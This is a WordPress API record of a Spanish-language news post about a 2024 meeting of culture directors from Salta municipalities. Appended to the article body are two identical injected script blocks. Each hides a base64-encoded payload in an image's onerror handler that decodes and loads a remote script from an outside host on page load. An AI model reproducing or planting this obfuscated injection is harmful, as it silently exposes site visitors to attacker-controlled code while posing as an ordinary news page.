{"id":3765,"date":"2024-02-28T18:03:52","date_gmt":"2024-02-28T21:03:52","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3765"},"modified":"2025-08-13T23:59:35","modified_gmt":"2025-08-14T02:59:35","slug":"salta-continua-potenciando-acciones-para-federalizar-la-cultura","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3765","title":{"rendered":"Salta contin\u00faa potenciando acciones para federalizar la cultura"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-23a2fc15a6a3aa3bf53bd17e9c1a2979\" style=\"background-color:#880741\"><em>Municipios de la provincia participaron del I Encuentro de Directores de Cultura 2024, para delinear las actividades del sector. El encuentro fue encabezado por la Ministra de Educaci\u00f3n..<\/em><\/h3>\n\n\n\n<p>Representantes, secretarios y directores de Cultura de diferentes municipios participaron de una reuni\u00f3n ampliada para delinear actividades culturales regionalizadas, para el per\u00edodo 2024. La actividad se concret\u00f3 en la Usina Cultural.<br><br>En la mesa de trabajo, encabezada por la ministra de Educaci\u00f3n, Cultura, Ciencia y Tecnolog\u00eda, Cristina Fiore,&nbsp;y el titular de la Secretar\u00eda de Cultura, Diego Ashur&nbsp;M\u00e1s, se defini\u00f3 como prioridad establecer pautas de labor regionalizado para garantizar el desarrollo conjunto de diferentes \u00e1reas culturales, potenciando la asistencia del organismo hacia las municipalidades a trav\u00e9s de las diferentes convocatorias abiertas como el Fondo Ciudadano de Desarrollo Cultural o el Fondo IDEA 2024.<br><br>En este marco, Fiore recalc\u00f3 la importancia del encuentro en tanto y en cuanto permite que los distintos actores establezcan una agenda com\u00fan, fortalezcan la colaboraci\u00f3n y promuevan el di\u00e1logo.<br><br>Por su parte Ashur M\u00e1s se\u00f1al\u00f3 que en conjunto con cada uno de los municipios este a\u00f1o se consensuar\u00e1n capacitaciones y trayectos formativos para todos los trabajadores culturales de Salta.<br><br>Se prev\u00e9 que el encuentro culmine con una revisi\u00f3n de bases para el Fondo Ciudadano de Desarrollo Cultural 2024.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"905\" height=\"600\" data-id=\"3767\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/6144-encuentro.jpg\" alt=\"\" class=\"wp-image-3767\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/6144-encuentro.jpg 905w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/6144-encuentro-300x199.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/6144-encuentro-768x509.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/6144-encuentro-696x461.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/6144-encuentro-634x420.jpg 634w\" sizes=\"(max-width: 905px) 100vw, 905px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"905\" height=\"600\" data-id=\"3766\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/6142-encuentro.jpg\" alt=\"\" class=\"wp-image-3766\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/6142-encuentro.jpg 905w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/6142-encuentro-300x199.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/6142-encuentro-768x509.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/6142-encuentro-696x461.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/6142-encuentro-634x420.jpg 634w\" sizes=\"(max-width: 905px) 100vw, 905px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"587\" data-id=\"3768\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/6143-encuentro-1024x587.jpg\" alt=\"\" class=\"wp-image-3768\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/6143-encuentro-1024x587.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/6143-encuentro-300x172.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/6143-encuentro-768x441.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/6143-encuentro-696x399.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/6143-encuentro-732x420.jpg 732w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/6143-encuentro.jpg 1046w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-continua-potenciando-acciones-para-federalizar-la-cultura-94401\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Municipios de la provincia participaron del I Encuentro de Directores de Cultura 2024, para delinear las actividades del sector. El encuentro fue encabezado por la Ministra de Educaci\u00f3n.. Representantes, secretarios y directores de Cultura de diferentes municipios participaron de una reuni\u00f3n ampliada para delinear actividades culturales regionalizadas, para el per\u00edodo 2024. La actividad se concret\u00f3 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3769,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-3765","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3765"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3765"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3765\/revisions"}],"predecessor-version":[{"id":6838,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3765\/revisions\/6838"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3769"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3765"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3765"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3765"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}